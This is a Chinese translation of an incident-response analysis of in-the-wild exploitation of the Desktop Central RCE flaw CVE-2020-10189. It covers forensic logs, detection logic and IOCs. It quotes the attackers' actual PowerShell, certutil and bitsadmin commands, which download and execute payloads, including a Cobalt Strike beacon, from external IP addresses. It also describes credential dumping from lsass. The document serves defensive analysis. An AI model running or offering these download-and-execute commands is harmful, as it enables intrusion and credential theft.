最新公告
  • 欢迎您光临悠哉网,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入我们
  • Desktop Central服务器RCE漏洞在野攻击分析

    0x01 漏洞披露

    在研究Desktop Central漏洞的过程中,我们在推特上找到了一位研究人员的帖子,该研究人员于2020年3月5日披露了Desktop Central的RCE漏洞。

    Zoho ManageEngine Desktop Central 10允许远程执行代码,漏洞成因是FileStorage类的getChartImage中的不可信数据反序列化,此漏洞和CewolfServlet,MDMLogUploaderServlet Servlet有关。

    对CVE-2020-10189的研究还显示,可以在Shodan上搜索易受攻击的Desktop Central服务器。

    Desktop Central服务器RCE漏洞在野攻击分析

    图2-在Shodan上可搜索的易受攻击的Desktop Central服务器

    在公网发现的威胁是有可疑的PowerShell下载通讯录,该通讯录包含下载文件的说明。

    最早威胁活动之一是一些可疑的PowerShell下载命令。该命令包含指令,以下载install.bat并storesyncsvc.dll到C:WindowsTemp,然后立即执行install.bat(图3)。

    1. cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:WindowsTempinstall.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:WindowsTempstoresyncsvc.dll')&C:WindowsTempinstall.bat 
    2. esktop Central服务器RCE漏洞在野攻击分析 

    图3-可疑的PowerShell下载命令

    该install.bat脚本包含storesyncsvc.dll作为服务安装在系统上的说明。(图4)。

    Desktop Central服务器RCE漏洞在野攻击分析

    图4-Install.bat的内容

    在运行PowerShell命令后,我们观察到安装了服务名称StorSyncSvc和显示名称为Storage Sync Service(图5)的新服务。

    Desktop Central服务器RCE漏洞在野攻击分析

    图5-安装Storage Sync Service

    VirusTotal上的查询结果表明,一些检测引擎已经归类storesyncsvc.dll为恶意软件。

    https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details

    0x02 利用过程跟踪识别漏洞利用

    此RCE漏洞已于2020年3月5日通过Twitter公开。

    回顾Sysmon流程创建事件,表明C:ManageEngineDesktopCentral_Serverjrebinjava.exe流程是负责执行PowerShell Download命令的流程(图6)。

    Desktop Central服务器RCE漏洞在野攻击分析

    图6-ParentImage负责PowerShell的下载

    查看内存中的进程,我们还观察到Desktop Central java.exe应用程序cmd.exe和2.exe之间的父/子进程关系(图7)。

    Desktop Central服务器RCE漏洞在野攻击分析

    图7- java.exe父/子进程关系

    0x03 利用文件系统识别漏洞利用

    为了进一步验证我们的理论,我们将从受影响的Desktop Central服务器收集的信息与已发布的POC进行了比较,确定攻击者可能利用了CVE-2020-10189漏洞在此易受攻击的系统上运行代码。

    通过文件系统时间轴分析,我们确定遍历文件写可能已在具有文件名_chart(图8)和logger.zip(图9)的系统上发生   。

    Desktop Central服务器RCE漏洞在野攻击分析

     图8- _chart文件系统分析

    Desktop Central服务器RCE漏洞在野攻击分析

    图9- logger.zip文件系统分析

    这些文件名也在@Steventseeley发布的POC中进行了引用(图10)。

    Desktop Central服务器RCE漏洞在野攻击分析

    图10-POC中对_chart和logger.zip的引用,参考:https : //srcincite.io/pocs/src-2020-0011.py.txt

    0x04 引入系统命令

    在随后的流程创建日志中,cmd.exe使用certutil.exe命令来下载和执行2.exe(图11),进一步的分析表明,很有可能   2.exe可能是C2工具Cobalt Strike的一部分。

    1. cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe 

    Desktop Central服务器RCE漏洞在野攻击分析

    图11-Certutil命令

    OSINT透露2.exe已被VirusTotal上的多个检测引擎识别为恶意软件:https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/details

    利用app.any.run沙箱(图12)和对恶意软件的内存分析,进一步证实2.exe托管Cobalt Strike Beacon payload的可能性。

    Desktop Central服务器RCE漏洞在野攻击分析

    图12- 2.exe被判定为恶意软件

    https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6

    我们对已知恶意软件2.exe所使用的所有内存段进行了yara扫描,yara扫描结果进一步支持了2.exe在其他几种可能的恶意软件签名的理论(图13)。

    Desktop Central服务器RCE漏洞在野攻击分析

    图13-Yarascan扫描结果

    利用Volatility的恶意插件,我们确定了几个可能存在代码注入迹象的内存部分,我们对另一个由malfind转储的内存段进行了yara扫描,进一步证实了我们的猜想。

    在下面的记录中可以看到整个过程(图14)。

    (原文中查看完整过程

    图14-Yarascan验证结果

    然后,我们检查了malfind的输出以获得代码注入的证据,并确定了其中的可疑内存部分svchost.exe(图15)。OSINT的研究使我们找到了一位研究人员,该研究人员对恶意软件进行了逆向,并找到了负责向其中注入代码的部分svchost.exe(图16)。

    Desktop Central服务器RCE漏洞在野攻击分析

     图15-对包含注入代码的svchost的分析

    Desktop Central服务器RCE漏洞在野攻击分析

    图16-@VK_Intel的分析显示了可能的注入功能

    参考:

    Desktop Central服务器RCE漏洞在野攻击分析

    在攻击结束后,我们观察到了恶意的Bitsadmin命令,其中包含install.bat从66.42.96.220可疑端口12345进行转移的指令。

    我们的分析师观察到,bitsadmin命令正在Desktop Central服务器上运行,该命令包含在PowerShell下载命令中调用的相同IP地址,端口和相同的install.bat文件(图17)。

    1. cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:UsersPublicinstall.bat 

    Desktop Central服务器RCE漏洞在野攻击分析

    图17-Bitsadmin命令

    0x05 访问凭证

    我们还观察到了潜在的凭证访问活动。攻击者执行凭据转储的常用技术是使用恶意进程(SourceImage)访问另一个进程(TargetImage),最常见的是将lsass.exe作为目标,因为它通常包含敏感信息,例如帐户凭据。

    在这里,我们观察到SourceImage 2.exe访问TargetImage lsass.exe(图18)。Cobalt Strike Beacon包含类似于Mimikatz的本机凭证转储功能,使用此功能的唯一必要条件是攻击者具有的SYSTEM特权,以下事件提供了充分的证据证明凭证访问的风险很高。

    Desktop Central服务器RCE漏洞在野攻击分析

    图18- 2.exe访问lsass.exe

    在对这种入侵进行分析的过程中,我们向Eric Zimmerman的KAPE工具添加了一些收集目标功能,以将相关日志添加到分类工作中。

    工具地址:https://binaryforay.blogspot.com/2019/02/introducing-kape.html

    针对相关日志的用法示例:

       kape.exe --tsource C: --tdest c:temptout --tflush --target ManageEngineLogs

    Sigma项目的Florian Roth创建了一个签名来检测攻击者利用的某些技术:

    https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml

    我们对该攻击的分析还发现,在进程创建日志中基于命令行活动进行检测将很有价值:

       ParentImage | endswith:     'DesktopCentral_Serverjrebinjava.exe'   CommandLine | contains:     '*powershell*'    '*certutil*'    '*bitsadmin*'

    0x06 IOCs

      ·Storesyncsvc.dll

    · MD5: 5909983db4d9023e4098e56361c96a6f

    · SHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c

      ·Install.bat

    · MD5: 7966c2c546b71e800397a67f942858d0

    · SHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc

      ·2.exe

    · MD5: 3e856162c36b532925c8226b4ed3481c

    · SHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309

    · 66[.]42[.]98[.]220

    · 91[.]208[.]184[.]78

    · 74[.]82[.]201[.]8

    本文翻译自:https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/ https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle如若转载,请注明原文地址

    1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
    2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
    3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
    4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
    5. 如有链接无法下载、失效或广告,请联系管理员处理!
    6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
    7. 如遇到加密压缩包,默认解压密码为"www.yoozai.net",如遇到无法解压的请联系管理员!
    悠哉网 » Desktop Central服务器RCE漏洞在野攻击分析

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    悠哉网 WWW.YOOZAI.NET
    悠哉网,用户消费首选的网站,喜欢你就悠哉一下。

    发表评论

    • 700会员总数(位)
    • 5255资源总数(个)
    • 97本周发布(个)
    • 5 今日发布(个)
    • 213稳定运行(天)

    提供最优质的资源集合

    立即查看 了解详情